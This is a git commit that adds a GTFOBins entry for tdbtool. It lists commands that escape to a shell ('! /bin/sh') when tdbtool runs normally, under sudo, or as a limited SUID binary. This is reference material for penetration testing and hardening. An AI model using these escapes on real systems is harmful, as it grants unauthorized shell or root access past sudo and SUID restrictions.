Add tdbtool

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Rob Fuller 2023-02-23 15:01:22 -05:00 committed by GitHub
parent d1d30414fe
commit abbed40f74
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

15
_gtfobins/tdbtool.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
tdbtool
! /bin/sh
sudo:
- code: |
sudo tdbtool
! /bin/sh
limited-suid:
- code: |
./tdbtool
! /bin/sh
---